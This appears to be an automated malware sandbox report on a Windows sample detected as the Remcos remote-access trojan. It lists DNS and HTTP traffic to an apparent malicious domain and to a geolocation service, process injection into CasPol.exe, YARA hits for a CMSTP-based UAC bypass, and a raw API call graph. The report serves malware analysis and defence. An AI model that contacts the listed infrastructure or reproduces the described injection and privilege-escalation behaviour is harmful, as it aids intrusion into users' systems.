2024-07-26T10:38:24.330685+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49703 | 40.68.123.157 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 26, 2024 10:38:03.938909054 CEST | 49377 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 10:38:04.290848017 CEST | 53 | 49377 | 1.1.1.1 | 192.168.2.7
Jul 26, 2024 10:38:06.241657019 CEST | 58604 | 53 | 192.168.2.7 | 1.1.1.1
Jul 26, 2024 10:38:06.252604008 CEST | 53 | 58604 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 26, 2024 10:38:03.938909054 CEST | 192.168.2.7 | 1.1.1.1 | 0xac79 | Standard query (0) | unifrieghtmovers.com | A (IP address) | IN (0x0001) | false
Jul 26, 2024 10:38:06.241657019 CEST | 192.168.2.7 | 1.1.1.1 | 0x2bd1 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 26, 2024 10:38:04.290848017 CEST | 1.1.1.1 | 192.168.2.7 | 0xac79 | No error (0) | unifrieghtmovers.com | | 23.95.60.82 | A (IP address) | IN (0x0001) | false
Jul 26, 2024 10:38:06.252604008 CEST | 1.1.1.1 | 192.168.2.7 | 0x2bd1 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 178.237.33.50 | 80 | 6780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Timestamp | Bytes transferred | Direction | Data
Jul 26, 2024 10:38:06.261507988 CEST | 71 | OUT | GET /json.gp HTTP/1.1
    Host: geoplugin.net
    Cache-Control: no-cache
Jul 26, 2024 10:38:06.927666903 CEST | 1170 | IN | HTTP/1.1 200 OK
    date: Fri, 26 Jul 2024 08:38:06 GMT
    server: Apache
    content-length: 962
    content-type: application/json; charset=utf-8
    cache-control: public, max-age=300
    access-control-allow-origin: *
                          Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                          Target ID:1
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Users\user\Desktop\C1ZsNxSer8.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\C1ZsNxSer8.exe"
                          Imagebase:0x7ff774a00000
                          File size:2'673'152 bytes
                          MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.1270156855.00000145BF964000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:04:38:02
                          Start date:26/07/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                          Imagebase:0x8c0000
                          File size:108'664 bytes
                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.3736494218.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high
                          Has exited:false


                            Execution Graph

                            Execution Coverage:6.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:25.7%
                            Total number of Nodes:914
                            Total number of Limit Nodes:28
15865 7ff774a0a037 15865->15642 15866 7ff774a19140 15865->15866 15909 7ff774a0e020 15866->15909 15870 7ff774a1915e 15872 7ff774a191d9 15870->15872 15916 7ff774a12260 15870->15916 15880 7ff774a1944b ISource 15872->15880 15930 7ff774a2f640 15872->15930 15874 7ff774a1964c 15875 7ff774a68fd0 _swprintf_c_l 3 API calls 15874->15875 15874->15880 15876 7ff774a19782 15875->15876 15876->15880 15953 7ff774a11eb0 15876->15953 15878 7ff774a197ad 15958 7ff774a2de20 15878->15958 15880->15643 15882 7ff774a06972 15881->15882 15883 7ff774a069ad 15882->15883 16145 7ff774a0fc70 CreateEventW 15882->16145 15883->15645 15885 7ff774a06984 15885->15883 16146 7ff774a0b320 CreateThread 15885->16146 15887 7ff774a069a3 15887->15645 15889 7ff774a0e9e7 15888->15889 15890 7ff774a0e9ef 15889->15890 15891 7ff774a68fd0 _swprintf_c_l 3 API calls 15889->15891 15890->15646 15895 7ff774a0ea21 15891->15895 15892 7ff774a0eb58 ISource 15892->15646 15894 7ff774a0eaf2 ISource 15894->15646 15895->15892 15896 7ff774a0eab5 ISource 15895->15896 16149 7ff774a14350 15895->16149 15896->15894 16155 7ff774a145e0 15896->16155 15903 7ff774a14c20 15898->15903 15902 7ff774a11d9f 15902->15865 15904 7ff774a68fd0 _swprintf_c_l 3 API calls 15903->15904 15905 7ff774a11d88 15904->15905 15905->15902 15906 7ff774a16770 15905->15906 15907 7ff774a68fd0 _swprintf_c_l 3 API calls 15906->15907 15908 7ff774a16785 15907->15908 15908->15902 15910 7ff774a0e0cc 15909->15910 15913 7ff774a0e05b 15909->15913 15915 7ff774a128a0 QueryPerformanceFrequency 15910->15915 15911 7ff774a0e094 15911->15910 15989 7ff774a0e0e0 15911->15989 15913->15910 15913->15911 15981 7ff774a0dd40 15913->15981 15915->15870 15917 7ff774a12283 15916->15917 15918 7ff774a12297 GetCurrentProcess IsProcessInJob 15917->15918 15924 7ff774a123d4 15917->15924 15921 7ff774a122ec 15918->15921 15922 7ff774a12393 15918->15922 15919 7ff774a12418 15926 7ff774a68fb0 8 API calls 15919->15926 15920 7ff774a12422 GlobalMemoryStatusEx 15920->15919 15921->15922 15925 7ff774a122f6 
QueryInformationJobObject 15921->15925 15923 7ff774a123ab GlobalMemoryStatusEx 15922->15923 15922->15924 15923->15924 15924->15919 15924->15920 15925->15922 15927 7ff774a12318 15925->15927 15929 7ff774a12464 15926->15929 15927->15922 15928 7ff774a1235c GlobalMemoryStatusEx 15927->15928 15928->15922 15929->15872 15998 7ff774a128f0 VirtualAlloc 15930->15998 15932 7ff774a2f662 15933 7ff774a2f6c7 15932->15933 16074 7ff774a12690 InitializeCriticalSection 15932->16074 15934 7ff774a2fabd 15933->15934 16001 7ff774a40410 15933->16001 15937 7ff774a2f6f1 _swprintf_c_l 15952 7ff774a2f933 15937->15952 16011 7ff774a2f340 15937->16011 15939 7ff774a2f8c8 16015 7ff774a2ce10 15939->16015 15943 7ff774a2f902 15943->15952 16022 7ff774a2fae0 15943->16022 15946 7ff774a2f928 16075 7ff774a129e0 VirtualFree 15946->16075 15948 7ff774a2f957 15948->15952 16036 7ff774a430a0 15948->16036 15952->15874 15954 7ff774a68fd0 _swprintf_c_l 3 API calls 15953->15954 15955 7ff774a11ed6 15954->15955 15956 7ff774a11ede CreateEventW 15955->15956 15957 7ff774a11f00 ISource 15955->15957 15956->15957 15957->15878 15959 7ff774a2deaa _swprintf_c_l 15958->15959 15960 7ff774a11eb0 4 API calls 15959->15960 15961 7ff774a2deb8 15960->15961 15980 7ff774a2e717 15961->15980 16123 7ff774a12880 QueryPerformanceCounter 15961->16123 15964 7ff774a2ded6 15965 7ff774a2e246 15964->15965 15964->15980 16124 7ff774a31660 15964->16124 15966 7ff774a31660 9 API calls 15965->15966 15967 7ff774a2e279 15966->15967 15968 7ff774a31660 9 API calls 15967->15968 15967->15980 15969 7ff774a2e2b8 15968->15969 15970 7ff774a68fd0 _swprintf_c_l 3 API calls 15969->15970 15969->15980 15971 7ff774a2e581 15970->15971 15972 7ff774a2e5cd 15971->15972 15973 7ff774a2e5e4 15971->15973 15971->15980 15975 7ff774a2e5da DebugBreak 15972->15975 15972->15980 15974 7ff774a68fd0 _swprintf_c_l 3 API calls 15973->15974 15976 7ff774a2e630 15974->15976 15975->15980 15977 7ff774a68fd0 _swprintf_c_l 3 API calls 15976->15977 15976->15980 15978 7ff774a2e6bd 15977->15978 
15978->15980 16138 7ff774a12690 InitializeCriticalSection 15978->16138 15980->15880 15984 7ff774a0dd64 15981->15984 15982 7ff774a68fd0 _swprintf_c_l 3 API calls 15983 7ff774a0ddcd 15982->15983 15985 7ff774a68fd0 _swprintf_c_l 3 API calls 15983->15985 15988 7ff774a0de85 ISource 15983->15988 15984->15982 15986 7ff774a0ddf8 15984->15986 15985->15986 15986->15988 15993 7ff774a0aea0 GetCurrentThreadId 15986->15993 15988->15911 15990 7ff774a0e135 15989->15990 15992 7ff774a0e13c 15989->15992 15994 7ff774a0db70 15990->15994 15992->15910 15993->15988 15995 7ff774a0db9a _swprintf_c_l 15994->15995 15996 7ff774a0dbc1 15995->15996 15997 7ff774a68fd0 _swprintf_c_l 3 API calls 15995->15997 15996->15992 15997->15996 15999 7ff774a12929 15998->15999 16000 7ff774a12911 VirtualFree 15998->16000 15999->15932 16000->15932 16002 7ff774a4043f 16001->16002 16003 7ff774a4046c 16002->16003 16004 7ff774a40462 16002->16004 16009 7ff774a40497 16002->16009 16006 7ff774a12a00 3 API calls 16003->16006 16076 7ff774a12a80 16004->16076 16008 7ff774a4047d 16006->16008 16008->16009 16087 7ff774a129e0 VirtualFree 16008->16087 16009->15937 16013 7ff774a2f35f 16011->16013 16014 7ff774a2f37c 16013->16014 16088 7ff774a11f70 16013->16088 16014->15939 16016 7ff774a2ce32 16015->16016 16017 7ff774a68fb0 8 API calls 16016->16017 16018 7ff774a2cf53 16017->16018 16019 7ff774a12a00 16018->16019 16020 7ff774a12a44 GetCurrentProcess VirtualAllocExNuma 16019->16020 16021 7ff774a12a25 VirtualAlloc 16019->16021 16020->15943 16021->16020 16026 7ff774a2fb0e 16022->16026 16023 7ff774a68fb0 8 API calls 16024 7ff774a2f924 16023->16024 16024->15946 16024->15948 16025 7ff774a2fec3 EnterCriticalSection 16025->16026 16028 7ff774a2fef0 LeaveCriticalSection 16025->16028 16026->16025 16027 7ff774a2fb18 16026->16027 16026->16028 16030 7ff774a2ffe1 LeaveCriticalSection 16026->16030 16031 7ff774a2ffb7 16026->16031 16095 7ff774a12930 16026->16095 16027->16023 16028->16026 16033 7ff774a2ffed 16030->16033 16032 7ff774a2ffc0 
EnterCriticalSection 16031->16032 16031->16033 16032->16030 16033->16027 16035 7ff774a30025 EnterCriticalSection LeaveCriticalSection 16033->16035 16098 7ff774a129c0 VirtualFree 16033->16098 16035->16033 16099 7ff774a42fb0 16036->16099 16039 7ff774a2ed00 16045 7ff774a2ed30 16039->16045 16040 7ff774a2f31d 16043 7ff774a2f332 16040->16043 16044 7ff774a2f326 16040->16044 16041 7ff774a2f311 16121 7ff774a11e10 CloseHandle 16041->16121 16043->15952 16122 7ff774a11e10 CloseHandle 16044->16122 16047 7ff774a11eb0 4 API calls 16045->16047 16072 7ff774a2ed8f 16045->16072 16048 7ff774a2edcf 16047->16048 16049 7ff774a11eb0 4 API calls 16048->16049 16048->16072 16050 7ff774a2ede5 _swprintf_c_l 16049->16050 16050->16072 16105 7ff774a12080 16050->16105 16052 7ff774a2f10a 16053 7ff774a11eb0 4 API calls 16052->16053 16054 7ff774a2f187 16053->16054 16055 7ff774a2f1c9 16054->16055 16056 7ff774a11eb0 4 API calls 16054->16056 16057 7ff774a2f2c9 16055->16057 16058 7ff774a2f2bd 16055->16058 16055->16072 16059 7ff774a2f19d 16056->16059 16061 7ff774a2f2de 16057->16061 16062 7ff774a2f2d2 16057->16062 16117 7ff774a11e10 CloseHandle 16058->16117 16059->16055 16112 7ff774a11e30 16059->16112 16063 7ff774a2f2e7 16061->16063 16064 7ff774a2f2f3 16061->16064 16118 7ff774a11e10 CloseHandle 16062->16118 16119 7ff774a11e10 CloseHandle 16063->16119 16067 7ff774a2f2fc 16064->16067 16064->16072 16120 7ff774a11e10 CloseHandle 16067->16120 16070 7ff774a2f1b3 16070->16055 16071 7ff774a11eb0 4 API calls 16070->16071 16071->16055 16072->16040 16072->16041 16073 7ff774a2f277 16072->16073 16073->15952 16074->15933 16075->15952 16077 7ff774a12aae LookupPrivilegeValueW 16076->16077 16078 7ff774a12b46 GetLargePageMinimum 16076->16078 16079 7ff774a12aca GetCurrentProcess OpenProcessToken 16077->16079 16080 7ff774a12b7f 16077->16080 16081 7ff774a12b83 GetCurrentProcess VirtualAllocExNuma 16078->16081 16082 7ff774a12b66 VirtualAlloc 16078->16082 16079->16080 16083 7ff774a12b01 AdjustTokenPrivileges GetLastError 
CloseHandle 16079->16083 16085 7ff774a68fb0 8 API calls 16080->16085 16081->16080 16082->16080 16083->16080 16084 7ff774a12b3b 16083->16084 16084->16078 16084->16080 16086 7ff774a12bb6 16085->16086 16086->16008 16087->16009 16089 7ff774a11f78 16088->16089 16090 7ff774a11f91 GetLogicalProcessorInformation 16089->16090 16094 7ff774a11fbd ISource 16089->16094 16091 7ff774a11fb2 GetLastError 16090->16091 16092 7ff774a11fc4 16090->16092 16091->16092 16091->16094 16093 7ff774a12001 GetLogicalProcessorInformation 16092->16093 16092->16094 16093->16094 16094->16014 16096 7ff774a1294b VirtualAlloc 16095->16096 16097 7ff774a1296e GetCurrentProcess VirtualAllocExNuma 16095->16097 16096->16026 16097->16026 16098->16033 16100 7ff774a42fc9 16099->16100 16102 7ff774a2fa9c 16099->16102 16101 7ff774a42fe4 LoadLibraryExW 16100->16101 16100->16102 16101->16102 16103 7ff774a43012 GetProcAddress 16101->16103 16102->16039 16104 7ff774a43027 16103->16104 16104->16102 16106 7ff774a120b7 GetCurrentProcess 16105->16106 16107 7ff774a1216f GlobalMemoryStatusEx 16105->16107 16108 7ff774a120d0 16106->16108 16110 7ff774a120d8 16107->16110 16108->16107 16108->16110 16109 7ff774a68fb0 8 API calls 16111 7ff774a12248 16109->16111 16110->16109 16111->16052 16113 7ff774a68fd0 _swprintf_c_l 3 API calls 16112->16113 16114 7ff774a11e56 16113->16114 16115 7ff774a11e5e CreateEventW 16114->16115 16116 7ff774a11e7e ISource 16114->16116 16115->16116 16116->16070 16117->16057 16118->16061 16119->16064 16120->16072 16121->16040 16122->16043 16123->15964 16127 7ff774a3168d 16124->16127 16125 7ff774a31767 16130 7ff774a317c1 16125->16130 16131 7ff774a12930 3 API calls 16125->16131 16126 7ff774a316e3 EnterCriticalSection 16129 7ff774a31700 16126->16129 16127->16125 16127->16126 16128 7ff774a317b1 LeaveCriticalSection 16132 7ff774a317bd 16128->16132 16129->16128 16134 7ff774a31745 LeaveCriticalSection 16129->16134 16139 7ff774a2e7a0 16130->16139 16135 7ff774a3178d 16131->16135 16132->15964 16134->16125 16135->16130 
16136 7ff774a31791 16135->16136 16136->16132 16137 7ff774a3179b EnterCriticalSection 16136->16137 16137->16128 16138->15980 16141 7ff774a2e7d1 16139->16141 16140 7ff774a2e965 16140->16132 16141->16140 16142 7ff774a2e94f DebugBreak 16141->16142 16143 7ff774a2e954 16141->16143 16142->16143 16143->16140 16144 7ff774a2e960 DebugBreak 16143->16144 16144->16140 16145->15885 16147 7ff774a0b34f 16146->16147 16148 7ff774a0b355 SetThreadPriority ResumeThread FindCloseChangeNotification 16146->16148 16147->15887 16148->15887 16150 7ff774a14383 _swprintf_c_l 16149->16150 16154 7ff774a143a9 ISource _swprintf_c_l 16150->16154 16158 7ff774a15300 16150->16158 16152 7ff774a143a0 16153 7ff774a0b410 InitializeCriticalSectionEx 16152->16153 16152->16154 16153->16154 16154->15895 16154->16154 16156 7ff774a0b3f0 DeleteCriticalSection 16155->16156 16157 7ff774a145f2 16156->16157 16159 7ff774a12a00 3 API calls 16158->16159 16160 7ff774a15322 16159->16160 16161 7ff774a1532a 16160->16161 16162 7ff774a12930 3 API calls 16160->16162 16161->16152 16163 7ff774a15348 16162->16163 16166 7ff774a15353 _swprintf_c_l 16163->16166 16167 7ff774a129e0 VirtualFree 16163->16167 16165 7ff774a1546e 16165->16152 16166->16152 16167->16165 16169 7ff774a0b1ee GetProcAddress 16168->16169 16170 7ff774a0b203 16168->16170 16169->16170 16170->15661 16172 7ff774a0b19e GetProcAddress 16171->16172 16173 7ff774a0b1b3 16171->16173 16172->16173 16173->15663 16243 7ff774a09500 16244 7ff774a0951f 16243->16244 16245 7ff774a09542 16244->16245 16255 7ff774a0b2e0 CreateThread 16244->16255 16247 7ff774a09534 16248 7ff774a09549 16247->16248 16249 7ff774a0953d 16247->16249 16262 7ff774a0fcf0 16248->16262 16258 7ff774a0fc10 16249->16258 16252 7ff774a09559 16253 7ff774a0fc10 CloseHandle 16252->16253 16254 7ff774a09563 16253->16254 16256 7ff774a0b309 FindCloseChangeNotification 16255->16256 16257 7ff774a0b304 16255->16257 16256->16247 16257->16247 16259 7ff774a0fc1f 16258->16259 16260 7ff774a0fc34 16258->16260 16259->16260 16261 
7ff774a0fc28 CloseHandle 16259->16261 16260->16245 16261->16260 16263 7ff774a0fd77 16262->16263 16264 7ff774a0fd1d 16262->16264 16263->16252 16265 7ff774a0fd9e 16264->16265 16267 7ff774a0fd58 16264->16267 16266 7ff774a0ad00 4 API calls 16265->16266 16266->16263 16269 7ff774a0ad00 16267->16269 16270 7ff774a0ad3c SetLastError CoWaitForMultipleHandles 16269->16270 16271 7ff774a0ad25 WaitForMultipleObjectsEx 16269->16271 16272 7ff774a0ad7e 16270->16272 16273 7ff774a0ad6a 16270->16273 16271->16272 16272->16263 16273->16272 16274 7ff774a0ad6e SetLastError 16273->16274 16274->16272 16275 7ff774a0fe40 16276 7ff774a0fe5a 16275->16276 16277 7ff774a0fe65 16275->16277 16278 7ff774a0fe92 VirtualAlloc 16277->16278 16283 7ff774a0fee6 16277->16283 16279 7ff774a0fecd 16278->16279 16278->16283 16280 7ff774a68fd0 _swprintf_c_l 3 API calls 16279->16280 16281 7ff774a0fede 16280->16281 16282 7ff774a0ff31 VirtualFree 16281->16282 16281->16283 16282->16283 16284 7ff774a09480 16285 7ff774a09498 16284->16285 16286 7ff774a0949f 16284->16286 16294 7ff774a04cc0 16285->16294 16300 7ff774a062a0 16286->16300 16289 7ff774a094bc 16309 7ff774a0fcc0 16289->16309 16291 7ff774a094cc 16312 7ff774a0e1d0 16291->16312 16295 7ff774a04ced 16294->16295 16296 7ff774a0acc0 3 API calls 16295->16296 16299 7ff774a04d0b 16295->16299 16297 7ff774a04d03 16296->16297 16318 7ff774a05920 16297->16318 16299->16286 16301 7ff774a06366 16300->16301 16302 7ff774a062b8 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 16300->16302 16301->16289 16303 7ff774a0aa30 VirtualQuery 16302->16303 16304 7ff774a0632c 16303->16304 16305 7ff774a0633a RaiseFailFastException 16304->16305 16306 7ff774a06347 16304->16306 16305->16306 16307 7ff774a0dcc0 4 API calls 16306->16307 16308 7ff774a0634f 16307->16308 16308->16289 16310 7ff774a0fcca 16309->16310 16311 7ff774a0fcd1 SetEvent 16309->16311 16310->16291 16311->16291 16314 7ff774a0e20a 16312->16314 16316 7ff774a0e22f _swprintf_c_l 16312->16316 16313 7ff774a094d6 
16314->16313 16315 7ff774a0dd40 4 API calls 16314->16315 16315->16316 16316->16313 16317 7ff774a68fd0 _swprintf_c_l 3 API calls 16316->16317 16317->16316 16319 7ff774a0594f 16318->16319 16326 7ff774a0aa30 VirtualQuery 16319->16326 16322 7ff774a059a0 RaiseFailFastException 16323 7ff774a059ad 16322->16323 16328 7ff774a0dcc0 16323->16328 16325 7ff774a059b5 16325->16299 16327 7ff774a0599c 16326->16327 16327->16322 16327->16323 16329 7ff774a0dcd2 16328->16329 16330 7ff774a0dcda 16328->16330 16329->16325 16331 7ff774a0dd40 4 API calls 16330->16331 16332 7ff774a0dd25 16330->16332 16331->16332 16332->16325 16333 7ff774a0a7a1 16334 7ff774a0a7b3 16333->16334 16335 7ff774a0a774 16333->16335 16340 7ff774a1744e 16334->16340 16348 7ff774a175d1 16334->16348 16352 7ff774a17420 16334->16352 16336 7ff774a0a7d4 16341 7ff774a1748b 16340->16341 16342 7ff774a174b5 16340->16342 16344 7ff774a17494 DebugBreak 16341->16344 16345 7ff774a17499 16341->16345 16356 7ff774a1cf30 16342->16356 16344->16345 16345->16336 16347 7ff774a174d8 16347->16345 16369 7ff774a19e40 16347->16369 16349 7ff774a175b0 16348->16349 16349->16348 16350 7ff774a17499 16349->16350 16351 7ff774a19e40 3 API calls 16349->16351 16350->16336 16351->16350 16353 7ff774a17499 16352->16353 16355 7ff774a17592 16352->16355 16353->16336 16354 7ff774a19e40 3 API calls 16354->16353 16355->16353 16355->16354 16366 7ff774a1cf5f 16356->16366 16357 7ff774a40880 WaitForSingleObject 16357->16366 16359 7ff774a1d019 SwitchToThread 16359->16366 16361 7ff774a1d13b 16361->16347 16364 7ff774a23670 39 API calls 16364->16366 16365 7ff774a1d045 SwitchToThread 16365->16366 16366->16357 16366->16359 16366->16361 16366->16364 16366->16365 16367 7ff774a34b90 GetTickCount64 16366->16367 16368 7ff774a1d00d SwitchToThread 16366->16368 16376 7ff774a1dbe0 16366->16376 16396 7ff774a406c0 16366->16396 16410 7ff774a128e0 16366->16410 16413 7ff774a1d660 16366->16413 16367->16366 16368->16366 16371 7ff774a19e76 16369->16371 16374 7ff774a19eaf 16369->16374 16370 
7ff774a19e89 SwitchToThread 16370->16371 16371->16370 16372 7ff774a128e0 SleepEx 16371->16372 16371->16374 16372->16371 16373 7ff774a19f85 ISource 16373->16345 16374->16373 16375 7ff774a19f80 DebugBreak 16374->16375 16375->16373 16377 7ff774a1ddd2 16376->16377 16378 7ff774a1dc1c 16376->16378 16381 7ff774a3ea80 6 API calls 16377->16381 16379 7ff774a1dc8d 16378->16379 16380 7ff774a1ddd7 16378->16380 16382 7ff774a1dc9c SwitchToThread 16379->16382 16380->16377 16427 7ff774a17080 16380->16427 16381->16377 16390 7ff774a1dcaa 16382->16390 16385 7ff774a1dd51 SwitchToThread 16385->16390 16387 7ff774a128e0 SleepEx 16387->16390 16390->16377 16390->16385 16390->16387 16393 7ff774a1dd7d SwitchToThread 16390->16393 16394 7ff774a1dd45 SwitchToThread 16390->16394 16423 7ff774a40880 16390->16423 16393->16390 16394->16390 16397 7ff774a40869 16396->16397 16398 7ff774a406dd 16396->16398 16397->16366 16399 7ff774a12080 10 API calls 16398->16399 16400 7ff774a40704 16399->16400 16401 7ff774a40857 16400->16401 16402 7ff774a17080 WaitForSingleObject 16400->16402 16401->16366 16408 7ff774a4073d 16402->16408 16403 7ff774a40840 16403->16366 16404 7ff774a407c9 SwitchToThread 16404->16408 16405 7ff774a407f5 SwitchToThread 16405->16408 16406 7ff774a128e0 SleepEx 16406->16408 16407 7ff774a40880 WaitForSingleObject 16407->16408 16408->16403 16408->16404 16408->16405 16408->16406 16408->16407 16409 7ff774a407bd SwitchToThread 16408->16409 16409->16408 16411 7ff774a128ed 16410->16411 16412 7ff774a128e4 SleepEx 16410->16412 16411->16366 16412->16411 16414 7ff774a1d69c 16413->16414 16415 7ff774a1d80b 16413->16415 16414->16415 16416 7ff774a128e0 SleepEx 16414->16416 16418 7ff774a1d6df 16416->16418 16417 7ff774a1d78a SwitchToThread 16417->16418 16418->16415 16418->16417 16419 7ff774a1d7b6 SwitchToThread 16418->16419 16420 7ff774a128e0 SleepEx 16418->16420 16421 7ff774a40880 WaitForSingleObject 16418->16421 16422 7ff774a1d77e SwitchToThread 16418->16422 16419->16418 16420->16418 16421->16418 16422->16418 
16424 7ff774a40896 16423->16424 16425 7ff774a408cd 16424->16425 16431 7ff774a12c40 WaitForSingleObject 16424->16431 16425->16390 16428 7ff774a17098 16427->16428 16432 7ff774a12c40 WaitForSingleObject 16428->16432 16433 7ff774a18602 16434 7ff774a18608 16433->16434 16457 7ff774a29420 16434->16457 16437 7ff774a18644 16461 7ff774a12880 QueryPerformanceCounter 16437->16461 16440 7ff774a18662 16462 7ff774a0a4d0 16440->16462 16442 7ff774a187a5 16450 7ff774a186c5 16442->16450 16478 7ff774a2a150 16442->16478 16446 7ff774a187ea 16447 7ff774a2d950 11 API calls 16446->16447 16446->16450 16447->16450 16448 7ff774a189d0 16451 7ff774a29420 SwitchToThread 16448->16451 16449 7ff774a18954 16500 7ff774a0a170 16449->16500 16450->16448 16450->16449 16499 7ff774a12880 QueryPerformanceCounter 16450->16499 16454 7ff774a189db 16451->16454 16456 7ff774a189fe 16454->16456 16508 7ff774a128d0 SetEvent 16454->16508 16458 7ff774a2943f 16457->16458 16459 7ff774a18626 16457->16459 16458->16459 16460 7ff774a29481 SwitchToThread 16458->16460 16459->16437 16472 7ff774a128c0 ResetEvent 16459->16472 16460->16458 16461->16440 16463 7ff774a0a4e5 16462->16463 16467 7ff774a0a548 16463->16467 16517 7ff774a0ae00 EventEnabled 16463->16517 16465 7ff774a0a51f 16465->16467 16518 7ff774a0a690 EventWrite 16465->16518 16509 7ff774a05140 16467->16509 16470 7ff774a0a59c 16470->16442 16470->16450 16473 7ff774a29650 16470->16473 16475 7ff774a29670 16473->16475 16474 7ff774a2d950 11 API calls 16474->16475 16475->16474 16476 7ff774a296da 16475->16476 16536 7ff774a2d200 16475->16536 16476->16442 16483 7ff774a2a165 16478->16483 16479 7ff774a2a24d 16480 7ff774a1d210 24 API calls 16479->16480 16485 7ff774a2a25f 16480->16485 16481 7ff774a2a264 16482 7ff774a2e7a0 2 API calls 16481->16482 16484 7ff774a2a28a 16482->16484 16483->16479 16483->16481 16496 7ff774a2a169 16483->16496 16484->16485 16486 7ff774a2a2a1 EnterCriticalSection LeaveCriticalSection 16484->16486 16487 7ff774a23f10 7 API calls 16485->16487 16490 7ff774a2a300 
16485->16490 16485->16496 16486->16485 16489 7ff774a2a2e6 16487->16489 16488 7ff774a2a3a8 DebugBreak 16492 7ff774a2a3b7 16488->16492 16489->16490 16491 7ff774a2a2ea 16489->16491 16490->16488 16493 7ff774a2a36b DebugBreak 16490->16493 16495 7ff774a2a388 DebugBreak 16490->16495 16497 7ff774a2a39f 16490->16497 16494 7ff774a26690 5 API calls 16491->16494 16492->16496 16498 7ff774a2a3cb DebugBreak 16492->16498 16493->16490 16494->16496 16495->16490 16496->16446 16497->16488 16497->16492 16498->16496 16499->16449 16501 7ff774a0a17d 16500->16501 16505 7ff774a0a1af 16500->16505 16620 7ff774a0ae00 EventEnabled 16501->16620 16503 7ff774a0a190 16503->16505 16621 7ff774a0a640 EventWrite 16503->16621 16506 7ff774a0a1fe 16505->16506 16624 7ff774a0ae00 EventEnabled 16505->16624 16506->16448 16510 7ff774a0517f 16509->16510 16511 7ff774a051a4 FlushProcessWriteBuffers 16510->16511 16513 7ff774a051d0 16511->16513 16512 7ff774a052a3 16512->16470 16521 7ff774a0ae00 EventEnabled 16512->16521 16513->16512 16514 7ff774a05209 16513->16514 16516 7ff774a0523e SwitchToThread 16513->16516 